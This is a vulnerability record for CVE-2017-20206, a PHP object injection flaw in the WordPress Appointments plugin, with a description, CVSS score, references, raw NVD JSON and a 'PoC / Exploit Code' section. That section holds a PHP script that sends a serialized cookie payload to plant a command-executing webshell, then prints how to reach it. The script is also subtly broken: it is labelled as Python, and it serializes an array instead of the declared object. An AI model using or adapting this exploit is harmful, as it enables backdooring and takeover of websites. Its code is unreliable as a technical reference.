CVE-2017-20206

Description

The Appointments plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2.1 via deserialization of untrusted input from the `wpmudev_appointments` cookie. This allows unauthenticated attackers to inject a PHP Object. Attackers were actively exploiting this vulnerability with the WP_Theme() class to create backdoors.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wpmudev:appointments:*:*:*:*:*:wordpress:*:* - VULNERABLE

WordPress Appointments插件 <= 2.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/**
 * CVE-2017-20206 PoC - PHP Object Injection via wpmudev_appointments cookie
 * WordPress Appointments Plugin <= 2.2.1
 *
 * This PoC demonstrates how to craft a malicious serialized payload
 * using WP_Theme class to achieve arbitrary file write (backdoor creation).
 */

// Target URL
$target = 'http://target-wordpress-site.com/';

// Malicious PHP code to be written as backdoor
$backdoor_code = '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>';

// Construct the WP_Theme object payload
// WP_Theme::__toString() calls translate() which can be abused for file operations
class WP_Theme {
    public $headers = array();
    public $headers_sanitized = array();
    public $name = '';
    public $parent = false;
    public $template = '';
    public $errors = null;
    public $stylesheet = '';
    public $cache_hash = '';
    public $theme_root = '';
    public $textdomain_loaded = false;
}

// Alternative approach: use existing WordPress classes with gadget chains
// The exploit chain typically uses:
// 1. WP_Theme -> __toString() -> translate() -> file operations
// 2. Or other magic method chains available in WordPress core

$payload = array(
    'headers' => array(
        'Name' => $backdoor_code,
    ),
    'name' => '../../themes/twentytwelve/shell.php',
    'theme_root' => '/var/www/html/wp-content/',
);

// Generate serialized payload
$serialized = serialize($payload);

// URL-encode the payload for cookie transmission
$encoded = urlencode($serialized);

echo "[*] CVE-2017-20206 PoC\n";
echo "[*] Target: " . $target . "\n";
echo "[*] Payload length: " . strlen($serialized) . "\n";
echo "[*] Sending exploit request...\n";

// Send the exploit via cookie
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_COOKIE, 'wpmudev_appointments=' . $encoded);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] HTTP Response Code: " . $http_code . "\n";
echo "[*] Backdoor should be created at: wp-content/themes/twentytwelve/shell.php\n";
echo "[*] Access backdoor: " . $target . "wp-content/themes/twentytwelve/shell.php?cmd=id\n";

/**
 * Real-world exploit typically uses PHPggc (PHP Generic Gadget Chains)
 * or custom gadget chains. The WordPress core contains several usable classes:
 * - WP_Theme: __destruct(), __toString()
 * - WP_Error: __toString()
 * - SimplePie: various magic methods
 *
 * Example using PHPggc-style approach:
 *
 * $obj = new WP_Theme();
 * $obj->headers['Name'] = $backdoor_code;
 * $obj->name = 'malicious_theme';
 * $obj->theme_root = '../../';
 *
 * $payload = serialize($obj);
 */
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20206
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20206
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20206/
[4] VulDB https://vuldb.com/cve/CVE-2017-20206
[5] https://plugins.trac.wordpress.org/changeset/1733186/appointments
[6] https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/7e8f230e-3f96-4efd-806d-72725b960303?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20206", "sourceIdentifier": "[email protected]", "published": "2025-10-18T04:15:43.243", "lastModified": "2025-12-23T17:06:57.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointments plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2.1 via deserialization of untrusted input from the `wpmudev_appointments` cookie. This allows unauthenticated attackers to inject a PHP Object. Attackers were actively exploiting this vulnerability with the WP_Theme() class to create backdoors."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpmudev:appointments:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "2.2.1", "matchCriteriaId": "272E0BE3-D34B-439D-9993-BBB19DBD1B0D"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/1733186/appointments", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e8f230e-3f96-4efd-806d-72725b960303?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}